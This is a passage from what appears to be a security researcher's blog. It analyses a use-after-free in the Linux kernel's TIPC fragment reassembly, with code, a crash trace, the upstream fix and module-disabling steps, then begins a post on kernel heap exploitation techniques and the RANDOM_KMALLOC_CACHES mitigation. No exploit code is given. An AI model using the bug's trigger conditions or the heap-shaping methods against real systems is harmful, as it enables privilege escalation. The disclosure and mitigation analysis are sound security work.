            rc |= tipc_link_input(l, skb, l->inputq, &l->reasm_buf);            [5]
        if (unlikely(++l->rcv_unacked >= TIPC_MIN_LINK_WIN))
            rc |= tipc_link_build_state_msg(l, xmitq);
        if (unlikely(rc & ~TIPC_LINK_SND_STATE))
            break;
    } while ((skb = __tipc_skb_dequeue(defq, l->rcv_nxt)));                     [4]

    /* Forward queues and wake up waiting users */
    if (released) {
        tipc_link_update_cwin(l, released, 0);
        tipc_link_advance_backlog(l, xmitq);
        if (unlikely(!skb_queue_empty(&l->wakeupq)))
            link_prepare_wakeup(l);
    }
    return rc;
}

net/tipc/link.c (6.7.4)

tipc_link_rcv() uses the sequence number, pulled from the TIPC message header [0], to determine the order in which to process the incoming skbs. It uses struct tipc_link to manage the link state, including what seqno it’s expecting next [1].

Out of order packets are either dropped [2] or added to the defer queue, defq, for later [3] [4]. When the correct seqno is hit, it will do some checks to see how to process it. When the user is MSG_FRAGMENTER, the packet is passed to #0 tipc_link_input() [5].

tipc_link_input(), #0, processes the packet depending on the user:

static int tipc_link_input(struct tipc_link *l, struct sk_buff *skb,
               struct sk_buff_head *inputq,
               struct sk_buff **reasm_skb)

    // snip

    } else if (usr == MSG_FRAGMENTER) {
        l->stats.recv_fragments++;
        if (tipc_buf_append(reasm_skb, &skb)) {
            l->stats.recv_fragmented++;
            tipc_data_input(l, skb, inputq);
        } else if (!*reasm_skb && !link_is_bc_rcvlink(l)) {
            pr_warn_ratelimited("Unable to build fragment list\n");
            return tipc_link_fsm_evt(l, LINK_FAILURE_EVT);
        }
        return 0;
    } // snip
    
    kfree_skb(skb);
    return 0;
}

net/tipc/link.c (6.7.4)

Examining `tipc_buf_append()`

This function is the root cause of the vulnerability. tipc_buf_append() is used to append the buffers containing message fragments, in order to reassemble the original message:

/* tipc_buf_append(): Append a buffer to the fragment list of another buffer
 * @*headbuf: in:  NULL for first frag, otherwise value returned from prev call
 *            out: set when successful non-complete reassembly, otherwise NULL
 * @*buf:     in:  the buffer to append. Always defined
 *            out: head buf after successful complete reassembly, otherwise NULL
 * Returns 1 when reassembly complete, otherwise 0
 */
int tipc_buf_append(struct sk_buff **headbuf, struct sk_buff **buf)
{
	struct sk_buff *head = *headbuf;
	struct sk_buff *frag = *buf;
	struct sk_buff *tail = NULL;
	struct tipc_msg *msg;
	u32 fragid;
	int delta;
	bool headstolen;

	if (!frag)
		goto err;

	msg = buf_msg(frag);
	fragid = msg_type(msg);                                     [0]
	frag->next = NULL;
	skb_pull(frag, msg_hdr_sz(msg));

	if (fragid == FIRST_FRAGMENT) {
		if (unlikely(head))
			goto err;
		*buf = NULL;
		if (skb_has_frag_list(frag) && __skb_linearize(frag))
			goto err;
		frag = skb_unshare(frag, GFP_ATOMIC);
		if (unlikely(!frag))
			goto err;
		head = *headbuf = frag;                                 [1]
		TIPC_SKB_CB(head)->tail = NULL;
		return 0;
	}

	if (!head)
		goto err;

	if (skb_try_coalesce(head, frag, &headstolen, &delta)) {    [2]
		kfree_skb_partial(frag, headstolen);
	} else {                                                    [3]
		tail = TIPC_SKB_CB(head)->tail;
		if (!skb_has_frag_list(head))
			skb_shinfo(head)->frag_list = frag;
		else
			tail->next = frag;
		head->truesize += frag->truesize;
		head->data_len += frag->len;
		head->len += frag->len;
		TIPC_SKB_CB(head)->tail = frag;
	}

	if (fragid == LAST_FRAGMENT) {
		TIPC_SKB_CB(head)->validated = 0;
		if (unlikely(!tipc_msg_validate(&head)))                [4]
			goto err;                                           [5]
		*buf = head;
		TIPC_SKB_CB(head)->tail = NULL;
		*headbuf = NULL;
		return 1;
	}
	*buf = NULL;
	return 0;
err:
	kfree_skb(*buf);                                            [6]
	kfree_skb(*headbuf);                                        [7]
	*buf = *headbuf = NULL;
	return 0;
}

net/tipc/msg.c (6.7.4)

Walking through a typical case, when the first fragment is received tipc_buf_append() is called with *headbuf == NULL & *buf pointing to the packet buffer of the first fragment. Note the fragment id (first, last or other) is stored in the TIPC header [0].

For the first fragment, some checks are done and this buffer is used to initialise heabuf [1] and it returns. For subsequent fragments in this sequence, heabuf is now initialised when tipc_buf_append() is called. These packets are then either coalesced into the head buffer [2] or added to its the frag_list [3].

Finally when the LAST_FRAGMENT is processed, added to the chain, the header of the initially fragmented packet is validated [4]. If you recall, the fragmented message is stored within the MSG_FRAGMENTER messages, so will have its own header that hasn’t been validated yet.

Notably, if this fails (e.g. we intentionally scuff up the header of the fragmented message), both the buffers are dropped [5] [6]. At this point buf points to the last fragment and headbuf points to the head buffer (the first fragment). It is possible for buf to be in the frag_list of headbuf at this point as we’ve seen.

However, kfree_skb() isn’t a simple kfree() wrapper, due to the complexity of struct sk_buff. It involves quite a bit of cleanup, including cleaning up the fragments reference by the frag_list … you can probably see where this is going!

The last fragment, buf, is freed [6]. Then, the head buffer is freed [7] whereby its frag_list is iterated for cleanup, leading to a use-after-free, as the final fragment has just been freed prior to this call [6]!

We can see this buy exploring the rest of the call trace when we trigger the bug:

[   48.900496] ==================================================================
[   48.901414] BUG: KASAN: slab-use-after-free in kfree_skb_list_reason+0x549/0x5c0
[   48.902395] Read of size 8 at addr ffff88800927c900 by task syz_test/207
[   48.903256] 
[   48.903450] CPU: 1 PID: 207 Comm: syz_test Not tainted 6.7.4-gd09175322cfa-dirty #6
[   48.904221] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[   48.905046] Call Trace:
[   48.905306]  
[   48.905490]  dump_stack_lvl+0x72/0xa0
[   48.905787]  print_report+0xcc/0x620
[   48.906736]  kasan_report+0xb0/0xe0
[   48.907096]  kfree_skb_list_reason+0x549/0x5c0
[   48.909613]  skb_release_data.isra.0+0x4fd/0x850
[   48.909997]  kfree_skb_reason+0xf4/0x380
[   48.910171]  tipc_buf_append+0x3e4/0xad0

The site that triggers KASAN is when the fragmented buffer list is iterated during kfree_skb_list_reason(). It is passed the frag_list of the head buffer in skb_release_data() [0]:

static void skb_release_data(struct sk_buff *skb, enum skb_drop_reason reason,
			     bool napi_safe)
{
	struct skb_shared_info *shinfo = skb_shinfo(skb);
	int i;

    // snip

free_head:
	if (shinfo->frag_list)
		kfree_skb_list_reason(shinfo->frag_list, reason);                       [0]

net/core/skbuff.c (6.7.4)

We can then see the KASAN trigger in kfree_skb_list_reason() here [1]:

void __fix_address
kfree_skb_list_reason(struct sk_buff *segs, enum skb_drop_reason reason)
{
	struct skb_free_array sa;

	sa.skb_count = 0;

	while (segs) {
		struct sk_buff *next = segs->next;                                      [1]

		if (__kfree_skb_reason(segs, reason)) {
			skb_poison_list(segs);
			kfree_skb_add_bulk(segs, &sa, reason);
		}

		segs = next;
	}

	if (sa.skb_count)
		kmem_cache_free_bulk(skbuff_cache, sa.skb_count, sa.skb_array);
}

net/core/skbuff.c (6.7.4)

Variations

There’s a couple of variations to this vulnerability which are worth mentioning. First of all, the vulnerable path can also be reached in a very similar manner via TUNNEL_PROTOCOL messages, as seen in this call trace:

kfree_skb_reason+0xf4/0x380 net/core/skbuff.c:1108
kfree_skb include/linux/skbuff.h:1234 [inline]
tipc_buf_append+0x3ce/0xb50 net/tipc/msg.c:186
tipc_link_tnl_rcv net/tipc/link.c:1398 [inline]
tipc_link_rcv+0x1a89/0x2dc0 net/tipc/link.c:1837
tipc_rcv+0x1220/0x3030 net/tipc/node.c:2173
tipc_udp_recv+0x745/0x930 net/tipc/udp_media.c:421

Additionally, some eagle eyed readers may also have noticed there’s another way to trigger the use-after-free within tipc_buf_append():

int tipc_buf_append(struct sk_buff **headbuf, struct sk_buff **buf)
{
    // snip

    if (skb_try_coalesce(head, frag, &headstolen, &delta)) {
        kfree_skb_partial(frag, headstolen);                        [0]
    } else {
        tail = TIPC_SKB_CB(head)->tail;
        if (!skb_has_frag_list(head))
            skb_shinfo(head)->frag_list = frag;
        else
            tail->next = frag;
        head->truesize += frag->truesize;
        head->data_len += frag->len;
        head->len += frag->len;
        TIPC_SKB_CB(head)->tail = frag;
    }

    if (fragid == LAST_FRAGMENT) {
        TIPC_SKB_CB(head)->validated = 0;
        if (unlikely(!tipc_msg_validate(&head)))
            goto err;
        *buf = head;
        TIPC_SKB_CB(head)->tail = NULL;
        *headbuf = NULL;
        return 1;
    }
    *buf = NULL;
    return 0;
err:
    kfree_skb(*buf);                                                [1]
    kfree_skb(*headbuf);                                            [2]
    *buf = *headbuf = NULL;
    return 0;
}

net/tipc/msg.c (6.7.4)

The initial free can occur at either site [0] or [1]. We’ve covered the latter case, but if the last fragment was coalesced, then the initial free occurs at [0] instead.

TIPC Protocol: 7.2.7. Message Fragmentation

Exploitation

Unfortunately I haven’t had the time to work on putting together an exploit for this vulnerability, though I’d love to set some time aside in the future. Sorry! :(

From an LPE perspective, the use-after-free of a struct sk_buff provides a pretty nice primitive due to its complexity and usage. There’s been some nice write-ups in the past making good use of the structure for LPE, so check those out if interested[2]

The RCE side of things is more opaque and something I’m really keen to explore more. Two major roadblocks for Linux kernel RCE are: KASLR and the drastically reduced surface for heap fengshui and generally affecting device state.

At least on the latter, we have some nice flexibility with this vulnerability. We have some control over the affected caches via our TIPC messages. The defer queue could potentially be used to introduce delays and control when objects are freed. Who knows!

Here are some posts on other TIPC related bugs and stuff for interested readers:

Fix + Remediation

---
 net/tipc/msg.c | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/net/tipc/msg.c b/net/tipc/msg.c
index 5c9fd4791c4ba1..9a6e9bcbf69402 100644
--- a/net/tipc/msg.c
+++ b/net/tipc/msg.c
@@ -156,6 +156,11 @@ int tipc_buf_append(struct sk_buff **headbuf, struct sk_buff **buf)
 	if (!head)
 		goto err;
 
+	/* Either the input skb ownership is transferred to headskb
+	 * or the input skb is freed, clear the reference to avoid
+	 * bad access on error path.
+	 */
+	*buf = NULL;
 	if (skb_try_coalesce(head, frag, &headstolen, &delta)) {
 		kfree_skb_partial(frag, headstolen);
 	} else {
@@ -179,7 +184,6 @@ int tipc_buf_append(struct sk_buff **headbuf, struct sk_buff **buf)
 		*headbuf = NULL;
 		return 1;
 	}
-	*buf = NULL;
 	return 0;
 err:
 	kfree_skb(*buf);

Commit 080cbb890286, authored by kuba-moo

We can see the patch is fairly simple (even if the context is not): the reference to the input skb ( buf ) is cleared before the error case that can cause the UAF. This is because the block handling the fragment coalescing/chaining already does the appropriate cleanup for it via frag (which at this point is also a reference to the input skb).

It’s a bit clearer if we provide some more context:

    /* Either the input skb ownership is transferred to headskb
     * or the input skb is freed, clear the reference to avoid
     * bad access on error path.
     */
    *buf = NULL;
    if (skb_try_coalesce(head, frag, &headstolen, &delta)) {  [2]
        kfree_skb_partial(frag, headstolen);                  [3]
    } else {                                                  [4]
        tail = TIPC_SKB_CB(head)->tail;
        if (!skb_has_frag_list(head))
            skb_shinfo(head)->frag_list = frag;
        else
            tail->next = frag;
        head->truesize += frag->truesize;
        head->data_len += frag->len;
        head->len += frag->len;
        TIPC_SKB_CB(head)->tail = frag;
    }

    if (fragid == LAST_FRAGMENT) {
        TIPC_SKB_CB(head)->validated = 0;
        if (unlikely(!tipc_msg_validate(&head)))
            goto err;
        *buf = head;                                          [0]
        TIPC_SKB_CB(head)->tail = NULL;
        *headbuf = NULL;
        return 1;
    }
    // before the patch: *buf = NULL;                         [1]
    return 0;
err:
    kfree_skb(*buf);
    kfree_skb(*headbuf);
    *buf = *headbuf = NULL;
    return 0;
}

net/tipc/msg.c (it’s not on elixir yet, but will link)

So if we recall our vulnerable case, after we’ve chained our last fragment, if the TIPC header of the fragmented message (which is now assembled) is invalid, we hit the error case at [0]. We then go to err: and cause the UAF, as buf was never cleared at [1].

By the time we reach [2] we know that the input skb is a trailing fragment and is reference by both buf and frag. At this point we don’t need the buf reference as the following block handles the input skb appropriately via frag: either it is coalesced into head and freed [3] or it is added to head’s frag list at which point head is responsible for it [4].

As a result, we can just clear the unnecessary buf reference before it can cause any trouble. Hopefully that’s not too convoluted an explanation for a simple patch!

Remediation

Chances are, as I mentioned up top, unless you’re running TIPC you’re all good! However, if you are, or want to be extra safe, prior to a patch being made available, the TIPC module can be disabled from loading if not in use:

$ lsmod | grep tipc will let you know if the module is currently loaded,
modprobe -r tipc may allow you to unload the module if loaded, however you may need to reboot your system
$ echo "install tipc /bin/true" >> /etc/modprobe.d/disable-tipc.conf will prevent the module from being loaded, which is a good idea if you have no reason to use it

Wrapup

As always, thank you for surviving up until this point! This research has been super fun, hopefully this has been an interesting read and not missing too much context; I appreciate it’s a particularly complex topic with lots of moving parts. Also, this was somewhat rushed due to having a lot going on at the moment, so I apologise for any drop in quality!

I’d like to thank ZDI and the Linux kernel maintainers for the work involved in getting this vulnerability disclosed and patched!

There’s quite a few things I’d love to do in follow-up to this post, if I can only find the time! I’d be happy to go into more detail on the discovery process and working with syzkaller, I really want to play around with exploitation and I also think it’d be neat to expand the Linternals blog series with some networking content!

In the meanwhile, if you’re interested in modifying syzkaller, checkout @notselwyn’s post on “Tickling ksmbd: fuzzing SMB in the Linux kernel”, I found it super helpful!

Feel free to @me if you have any questions, suggestions or corrections :)

exit(0);

Exploring Linux's New Random Kmalloc Caches

sam4k — Fri, 03 Nov 2023 14:10:43 +0000

In this post we’re going to be taking a look at the state of contemporary kernel heap exploitation and how the new opt-in hardening feature added in the 6.6 Linux kernel, RANDOM_KMALLOC_CACHES, looks to address that.

To provide some context to the problems RANDOM_KMALLOC_CACHES tries to address, we’ll spend a bit of time covering the current heap exploitation meta. This actually ended up being reasonably in-depth (oops) and touches on general approaches to exploitation as well as current mitigations and techniques such as heap feng shui, cache reuse attacks, FUSE and making use of elastic objects.

Armed with that information we’ll then explore the new patch in detail, discuss how it addresses heap exploitation and have a bit of fun speculating how the meta might shift as a result of this.

As this post is focusing on kernel heap exploitation, I’ll be assuming some prerequisite knowledge around topics like kernel memory allocators (luckily for you I’ve written about this already in some detail as part of Linternals, here).

Current Heap Exploitation Meta
Introducing Random Kmalloc Caches
Diving Into The Implementation
What’s The New Meta?
Wrapping Up

Current Heap Exploitation Meta

Alright, before we dive into the juicy details lets quickly touch on the current state of heap exploitation to help us understand why this patch was added and how it effects things!

Heap corruption is one of the more common types of bugs found in the kernel today (think use-after-free, heap overflow etc.). When we talk about heap corruption in the Linux kernel, we’re referring to memory dynamically allocated via the slab allocator (e.g. [kmalloc()](https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L590)) or directly via the page allocator (e.g. [alloc_pages()](https://elixir.bootlin.com/linux/v6.6/source/include/linux/gfp.h#L269)).

The fundamental goal of exploitation is to leverage our heap corruption to gain more control over the system, typically to elevate our privileges or at least get closer to being able to do so.

In reality, these heap corruptions can come in all shapes and sizes. The objects we’re able to use-after-free can come from different caches, there may be a race involved, there may be fields which need to be specific values etc. Similarly our overflows can also have any number of constraints which impact our approach to leverage the corruption.

However, there exist a number of generic techniques for heap exploitation, which help cut down on the time needed to go from heap corruption to working exploit. As we know, security is a cat and mouse game, so these techniques are continually adapting to keep up with new mitigations.

From a defenders perspective, in an ideal world we would mitigate heap corruption bugs entirely. Failing that, we can make it as hard as possible for attackers to leverage any heap corruption bugs they do find. Responding to the generic techniques used by attackers is a good way to go about this, forcing each bug to require a bespoke approach to exploit.

Approaching Heap Exploitation

Okay with the exposition out of the way, lets talk a bit about how we might go about exploiting a heap corruption in the kernel nowadays. I’m going to (try) keep things fairly high level, with a focus on the slab allocator side of things due to the topics context.

So first things first we want to make sure we understand the bug itself: how do we reach it, what kernel configurations or capabilities do we require? What is the nature of the corruption, is it a use-after-free? What are the limitations around triggering the bug? What data structures are effected, what are the risks of a kernel panic?

Then we want to get into the specifics of the heap corruption itself. How are the affected objects allocated? Is it via the slab allocator or the page allocator? For slab allocations, we’re interested in what cache the object is allocated to, so we can infer what other objects share the same cache and can potentially be corrupted.

There are several factors to consider at the moment when determining what cache our object will end up in:

The API used will tell us if its allocated into a general purpose cache with other similar sized objects (kmalloc(), kzalloc(), kcalloc() etc.) or private cache ( [kmem_cache_alloc()](https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L499)) with slabs containing only objects of that type.
The GFP (Get Free Page) flags used can tell us which of the general purpose cache types the object is allocated. By default, allocations will go to the standard general purpose caches, kmalloc-x, where x is the “bucket size”. The other common case is GFP_KERNEL_ACCOUNT, typically used for untrusted allocations[1], will put objects in an accounted cache, named kmalloc-cg-x.
The size of the object will determine, for general purpose caches, which “bucket size” the object will end up in. The x in kmalloc-x denotes the fixed size in bytes allocated to each object in the cache’s slabs. Objects will be allocated into the smallest general purpose cache is can fit into.

Now we’ve built up an understanding of the bug and how it’s allocated, it’s time to think about how we want to use our corruption. By knowing what cache our object is in, we know what other objects can or can’t be allocated into the same slab.

The general goal here is to find a viable object to corrupt. We can use our understanding of how the slab allocator works in order to shape the layout of memory to make this more reliable, or to make otherwise incorruptible objects corruptible.

Current Mitigations

However, before we get ahead of ourselves, we first have to consider any mitigations that might impact our ability to exploit our bug on modern systems. This won’t be an exhaustive list, but will help provide some context on the current meta:

[CONFIG_SLAB_FREELIST_HARDENED](https://cateee.net/lkddb/web-lkddb/SLAB_FREELIST_HARDENED.html) adds checks to protect slab metadata, such as the freelist pointers stored in free objects within a SLUB slab and checks for double-frees.
[CONFIG_SLAB_FREELIST_RANDOM](https://cateee.net/lkddb/web-lkddb/SLAB_FREELIST_RANDOM.html) randomises the freelist order when a new cache slab is allocated, such that an attacker can’t infer the order objects within that slab will be filled. The aim to reduce the knowledge & control attackers have over heap state.
[CONFIG_STATIC_USERMODEHELPER](https://cateee.net/lkddb/web-lkddb/STATIC_USERMODEHELPER.html) mitigates a popular technique for leveraging heap corruption, which we’ll touch on in the next section.
Slab merging, enabled via slub_merge bootarg or CONFIG_SLAB_MERGE_DEFAULT=y, allows slab caches to be merged for performance. As you can imagine, this is nice for attackers as it opens up our options for corruption.
Some others, which are less commonly enabled afaik, or out of scope include [CONFIG_SHUFFLE_PAGE_ALLOCATOR](https://cateee.net/lkddb/web-lkddb/SHUFFLE_PAGE_ALLOCATOR.html), [CONFIG_CFI_CLANG](https://cateee.net/lkddb/web-lkddb/CFI_CLANG.html), init_on_alloc / [CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y](https://cateee.net/lkddb/web-lkddb/INIT_ON_ALLOC_DEFAULT_ON.html) & init_on_free / [CONFIG_INIT_ON_FREE_DEFAULT_ON=y](https://cateee.net/lkddb/web-lkddb/INIT_ON_FREE_DEFAULT_ON.html).

Generic Techniques

Okay, now we’re ready to starting pwning the heap. We understand our bug, the allocation context and the kind of mitigations we’re dealing with. Let’s explore some contemporary techniques used to get around this mitigation and exploit heap corruptions bugs!

Basic Heap Feng Shui

A fundamental aspect of heap corruption is the ability to shape the heap, commonly referred to as “heap feng shui”. We can use our understanding of how the allocator works and the mitigations in place to try get things where we want them in the heap.

Lets use a generic heap overflow to demonstrate this. We can overflow object x and we want to corrupt object y. They’re in the same generic cache, so our goal is to land y adjacent to x in the same slab.

We want to consider how active the cache is (aka is it cache noise) and up-time, as this will give us an idea of the cache slab state. On a typical workload with a fairly used cache size, we can assume there are likely to be several partially filled slabs; this is our starting state.

A basic heap feng shui approach would be to first allocate a number of object y to fill up the holes in the partial slabs:

Then, we allocate several slabs worth of object y which we can assume is to trigger new slabs to be allocated, hopefully filled with object y:

Then, from the second batch of allocations into new slabs, we would free every other allocation to try and create holes in the new slabs:

We would then allocate our vulnerable object x in the hopes we have increased our chances that it will be allocated into one of the wholes we just created:

Cache Reuse/Overflow Attacks

Remember earlier we mentioned how there are different types of general purpose caches and even private caches, all with their own slabs? What if our vulnerable object is in one cache and we found an object we really, really wanted to corrupt in another cache?

If we recall our memory allocator fundamentals[2], we know that the page allocator is the fundamental memory allocator for the Linux kernel, sitting above it is the slab allocator. So the slab allocator makes use of the page allocator, this includes for the allocation of the chunks of memory used as slabs (to hold cache objects). Are you still with me?

So when all the objects in a slab are freed, the slab itself may in turn be freed back to the page allocator, ready to be reallocated. Can you see where this is going?

If we have a UAF on an object in a private cache slab, if that slab is then freed and reallocated as a general purpose cache, suddenly our UAF’d memory is pointing to general purpose objects! Our options for corruption have suddenly expanded!

This kind of technique is known as a “cache reuse” attack and has been documented previously in more detail[3]. By using a similar approach of manipulating the underlying page layout, “cache overflow” attacks are possible too, where you align to slabs from separate caches adjacent to one another in physical memory, which has been used in some great CTF writeups[4].

Elastic Objects

Another cornerstone of contemporary heap exploitation is the use of “elastic objects”[6]. These are essential structures that have a dynamic size, typically a length field will describe the size of a buffer within the same struct.

Sounds pretty straight forward, right? Why is this relevant? Well, we’ve spoken about the bespoke nature of heap corruption vulnerabilities, and the variety of cache types and sizes.

Elastic objects can provide generic techniques to exploiting these vulnerabilities, as objects that can be corrupted across a variety of cache sizes due to their elastic nature. By generalising the object being corrupted, a lot of time can be spent mining for objects that are corruptible for a certain cache size and then developing a bespoke technique for using that specific corruption to elevate privileges (which can be quite time consuming!).

A popular elastic object used on contemporary heap corruption is [struct msg_msg](https://elixir.bootlin.com/linux/v6.6/source/include/linux/msg.h#L9), which can be used to leverage an out-of-bounds heap write into arbitrary read/write[5]:

/* one msg_msg structure for each message */
struct msg_msg {
	struct list_head m_list;
	long m_type;
	size_t m_ts;		/* message text size */
	struct msg_msgseg *next;
	void *security;
	/* the actual message follows immediately */
};

include/linux/msg.h (v6.6)

FUSE

Seeing as we’re going all out on the exploitation techniques here, I might as well throw in a quick shoutout to FUSE as well, which is commonly used in kernel exploitation.

Filesystem in Userspace is “is an interface for userspace programs to export a filesystem to the Linux kernel.”[7], enabled via [CONFIG_FUSE_FS](https://cateee.net/lkddb/web-lkddb/FUSE_FS.html)=y. Essentially it allows, often unprivileged, users to define their own filesystems.

Normally, mounting filesystems is a privileged action and actually defining a filesystem would require you to write kernel code. With FUSE, we can do away with this. By defining the read operations in our FUSE FS, we’re able to define what happens when kernel tries to read one our FUSE files, which includes sleeping…

This gives us the ability to arbitrarily block kernel threads that try to read files in our FUSE FS (essentially accessing to user virtual addresses we can control, as we can map in one of our FUSE files and pass that over to the kernel).

So what does this have to do with kernel exploitation? Well, as we mentioned previously, a key part of heap exploitation is finding interesting objects to corrupt or control the layout of memory. Ideally we want to be able to allocate and free these on demand, if they’re immediately freed there’s not too much we can do with them … right?

Perhaps! This is where FUSE comes in: if we have a scenario where an object we really, really want to corrupt is allocated and freed within the same system call, we may be able to keep it in memory if there’s a userspace access we can block on between the allocation and free! You can find more on this, plus some examples, from this 2018 Duasynt blog post.

https://www.kernel.org/doc/Documentation/core-api/memory-allocation.rst
https://sam4k.com/linternals-memory-allocators-part-1/
https://duasynt.com/blog/linux-kernel-heap-feng-shui-2022
https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html
https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html
the earliest mention i’m aware of in an kernel xdev context is from the 2020 paper, “A Systematic Study of Elastic Objects in Kernel Exploitation”, could we be wrong tho
https://github.com/libfuse/libfuse
https://duasynt.com/blog/linux-kernel-heap-spray

Introducing Random Kmalloc Caches

Well, that was quite the background read (sorry not sorry), but we’re hopefully in a good position to dive into this new mitigation: Random kmalloc caches[1].

This mitigation effects the generic slab cache implementation. Previously, there was a single generic slab cache for each size “step”: kmalloc-32, kmalloc-64, kmalloc-128 etc. Such that an 40 byte object, allocated via kmalloc(), with the correct GFP flags, is always going to end up in the kmalloc-64 cache. Straightforward right?

CONFIG_RANDOM_KMALLOC_CACHES=y introduces multiple generic slab caches for each size, 16 by default (named kmalloc-rnd-01-32, kmalloc-rnd-02-32 etc.). When an object allocated via kmalloc() it is allocated to one of these 16 caches “randomly”, depending on the callsite for the kmalloc() and a per-boot seed.

Developed by Huawei engineers, this mitigation aims to make exploiting slab heap corruption vulnerabilities more difficult. By distributing the available general purpose objects for heap feng shui for any given cache size non-deterministically across up to 16 different caches, it’s harder for an attacker to target specific objects or caches for exploitation.

If you’re interested in more information, you can also follow the initial discussions over on the Linux kernel mailing list.[2][3][4]

Diving Into The Implementation

The time has come, I’m sure you’ve all been chomping at the bit for the last 2000 words, let’s dig into the implementation for this patch and see what the deal is.

Honestly the implementation for this mitigation is actually pretty straight forward, with only 97 additions and 15 deletions across 7 files, so more than anything it’s going to be a bit of a primer on the parts of the kmalloc API that are effected by this patchset.

We’ll follow up with a bit of an analysis on the pros and cons of the implementation tho.

Cache Setup

So first things first lets touch on how the kmalloc caches are actually created by the kernel and some of the changes needed to include the random cache copies.

The header additions include configurations for things like the number of cache copies:

+#ifdef CONFIG_RANDOM_KMALLOC_CACHES
+#define RANDOM_KMALLOC_CACHES_NR	15 // # of cache copies
+#else
+#define RANDOM_KMALLOC_CACHES_NR	0
+#endif

The [kmalloc_cache_type](https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L363) enum is used to manage the different kmalloc cache types. [create_kmalloc_caches()](https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L956) allocates the initial [struct kmem_cache](https://elixir.bootlin.com/linux/v6.6/source/include/linux/slub_def.h#L98) objects, which represent the slab caches we’ve been talking about, which are then stored in the exported [struct kmem_cache * kmalloc_caches[NR_KMALLOC_TYPES][KMALLOC_SHIFT_HIGH + 1]](https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L677) array. As we can see from the definition, the cache type is used as one of the indexes into the array to fetch a cache, the other is the size index for that cache type (see [size_index[24]](https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L692)).

With that in mind, an entry for each of the cache copies is added to [enum kmalloc_cache_type](https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L363) so that they’re created and fetchable as part of the existing API:

enum kmalloc_cache_type {
	KMALLOC_NORMAL = 0,
#ifndef CONFIG_ZONE_DMA
	KMALLOC_DMA = KMALLOC_NORMAL,
#endif
#ifndef CONFIG_MEMCG_KMEM
	KMALLOC_CGROUP = KMALLOC_NORMAL,
#endif
+	KMALLOC_RANDOM_START = KMALLOC_NORMAL,
+	KMALLOC_RANDOM_END = KMALLOC_RANDOM_START + RANDOM_KMALLOC_CACHES_NR,
#ifdef CONFIG_SLUB_TINY
	KMALLOC_RECLAIM = KMALLOC_NORMAL,
#else
	KMALLOC_RECLAIM,
#endif
#ifdef CONFIG_ZONE_DMA
	KMALLOC_DMA,
#endif
#ifdef CONFIG_MEMCG_KMEM
	KMALLOC_CGROUP,
#endif
	NR_KMALLOC_TYPES
};

diff from include/linux/slab.h

The [kmalloc_info[]](https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L824) is another key data structure in the kmalloc cache initialisation. This array essentially contains a [struct kmalloc_info_struct](https://elixir.bootlin.com/linux/v6.6/source/mm/slab.h#L275) for each of the kmalloc “bucket” sizes we talk about. Each element stores the size fo the bucket and the name for the various caches types of that size. E.g. kmalloc-rnd-01-64 or kmalloc-cg-64.

This array is then used to pull the correct cache name to pass to [create_kmalloc_cache()](https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L661) given the size index and cache type.

I’m speeding through this, but you can probably tell already this is going to involve some macros. [INIT_KMALLOC_INFO(__size, __short_size)](https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L809) is used to initialise each of the elements in kmalloc_info[], with additional macros to initialise each of the name[] elements according to type.

Below we can see the addition of the kmalloc random caches:

+#ifdef CONFIG_RANDOM_KMALLOC_CACHES
+#define __KMALLOC_RANDOM_CONCAT(a, b) a ## b
+#define KMALLOC_RANDOM_NAME(N, sz) __KMALLOC_RANDOM_CONCAT(KMA_RAND_, N)(sz)
+#define KMA_RAND_1(sz)                  .name[KMALLOC_RANDOM_START +  1] = "kmalloc-rnd-01-" #sz,
+#define KMA_RAND_2(sz)  KMA_RAND_1(sz)  .name[KMALLOC_RANDOM_START +  2] = "kmalloc-rnd-02-" #sz,
+#define KMA_RAND_3(sz)  KMA_RAND_2(sz)  .name[KMALLOC_RANDOM_START +  3] = "kmalloc-rnd-03-" #sz,
+#define KMA_RAND_4(sz)  KMA_RAND_3(sz)  .name[KMALLOC_RANDOM_START +  4] = "kmalloc-rnd-04-" #sz,
+#define KMA_RAND_5(sz)  KMA_RAND_4(sz)  .name[KMALLOC_RANDOM_START +  5] = "kmalloc-rnd-05-" #sz,
+#define KMA_RAND_6(sz)  KMA_RAND_5(sz)  .name[KMALLOC_RANDOM_START +  6] = "kmalloc-rnd-06-" #sz,
+#define KMA_RAND_7(sz)  KMA_RAND_6(sz)  .name[KMALLOC_RANDOM_START +  7] = "kmalloc-rnd-07-" #sz,
+#define KMA_RAND_8(sz)  KMA_RAND_7(sz)  .name[KMALLOC_RANDOM_START +  8] = "kmalloc-rnd-08-" #sz,
+#define KMA_RAND_9(sz)  KMA_RAND_8(sz)  .name[KMALLOC_RANDOM_START +  9] = "kmalloc-rnd-09-" #sz,
+#define KMA_RAND_10(sz) KMA_RAND_9(sz)  .name[KMALLOC_RANDOM_START + 10] = "kmalloc-rnd-10-" #sz,
+#define KMA_RAND_11(sz) KMA_RAND_10(sz) .name[KMALLOC_RANDOM_START + 11] = "kmalloc-rnd-11-" #sz,
+#define KMA_RAND_12(sz) KMA_RAND_11(sz) .name[KMALLOC_RANDOM_START + 12] = "kmalloc-rnd-12-" #sz,
+#define KMA_RAND_13(sz) KMA_RAND_12(sz) .name[KMALLOC_RANDOM_START + 13] = "kmalloc-rnd-13-" #sz,
+#define KMA_RAND_14(sz) KMA_RAND_13(sz) .name[KMALLOC_RANDOM_START + 14] = "kmalloc-rnd-14-" #sz,
+#define KMA_RAND_15(sz) KMA_RAND_14(sz) .name[KMALLOC_RANDOM_START + 15] = "kmalloc-rnd-15-" #sz,
+#else // CONFIG_RANDOM_KMALLOC_CACHES
+#define KMALLOC_RANDOM_NAME(N, sz)
+#endif
+
